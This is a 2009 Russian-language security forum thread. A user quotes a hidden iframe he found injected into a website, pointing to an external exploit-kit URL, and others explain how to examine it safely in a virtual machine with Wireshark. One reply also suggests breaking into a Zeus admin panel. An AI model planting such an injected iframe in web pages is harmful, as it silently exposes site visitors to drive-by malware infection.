Нашёл скрытый iframe.

Discussion in 'Безопасность и Анонимность' started by Kornero, 30 Aug 2009.

  1. Kornero

    Kornero New Member

    Joined:
    31 Dec 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    На главной странице одного сайта нашёл такой код
    Если я правильно всё понял, то эта какая-то бяка=)
    Code:
    <body bgcolor="#99AFC1" vlink="#DDDDDD" alink="#DDDDDD" link="#DDDDDD"><iframe src="http://u0b.ru:8080/index.php" width=190 height=168 style="visibility: hidden"></iframe>
    НОД32 благополуно прошляпил. Самое странное что у меня запустилась ява машина...

    Как можно без вреда для здоровья проверить что там грузится?
     
    #1 Kornero, 30 Aug 2009
  2. r00nix

    r00nix Banned

    Joined:
    7 May 2009
    Messages:
    48
    Likes Received:
    20
    Reputations:
    0
    Я для таких вещей всегда использую виртуалку, подключенную через нат, со свежеустановленной старой ХР и дырявым осликом на ней, а поверх виртуалки запускаю Wireshark. Тогда связка пробивает ослика (причем ты будешь знать, какими сплоентами, из пакетов, перехваченных шарком), и грузит исполняемый файл. А там уже может быть что угодно. Порой тоже интересное встречается) Особенно если там будет Zeus, то можно попробовать прочитать конфиги, залезть в админку и многое другое)
     
    #2 r00nix, 30 Aug 2009
    1 person likes this.
  3. Kornero

    Kornero New Member

    Joined:
    31 Dec 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    2 r00nix
    Спасибо за подсказу, в частности за софт ( Wireshark - прога гуд). Но только чёт у меня не получается =( Там какая-то защита стоит что один раз зашёл по ссылке, и дальше выдается пустая страница, но когда заходишь в первый раз, то пхпшный скрипт делает куда-то редирект, и потом запускается ява машина...я хз почему может какой ява аплет, я плохо знаю эту область...
    Я так и не понял как скрипт блочит определённый комп...Ип менял все куки стёр, браузеры разные юзал. Но на след. день оно опять 1 раз сработала, а я проморгал =(

    Если не сложно проверьте плиз кто-нить куда скрипт перекидывает дальше. Если бы эта хрень просто куки пёрла я был бы очень рад, но на кой тогда ява...
     
    #3 Kornero, 30 Aug 2009
  4. zannussi

    zannussi Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    4
    Likes Received:
    18
    Reputations:
    2
    Kornero,
    большинство связок сейчас работают с базами, твой ип уже там, и куки у тебя. В настройках так же есть время, которое он будет не пускать неоригинальных пользователей на сплойт. Но странно, что ты поменял ип, стер куки, юзал другой браузер, а сплойт тебя опять куда-то редиректил без пробива. Ты писал про яву, может сплойт прочитал твой хдд-номер или еще какую инфу? хотя нафига такие навороты :))
     
    #4 zannussi, 31 Aug 2009
    1 person likes this.
  5. JOHNik

    JOHNik Member

    Joined:
    21 Apr 2009
    Messages:
    51
    Likes Received:
    14
    Reputations:
    0
    Глянул, по крайней мере сейчас по этому адресу ничего нет, да и почему это он скрытый? он не скрытый!
     
    #5 JOHNik, 15 Oct 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.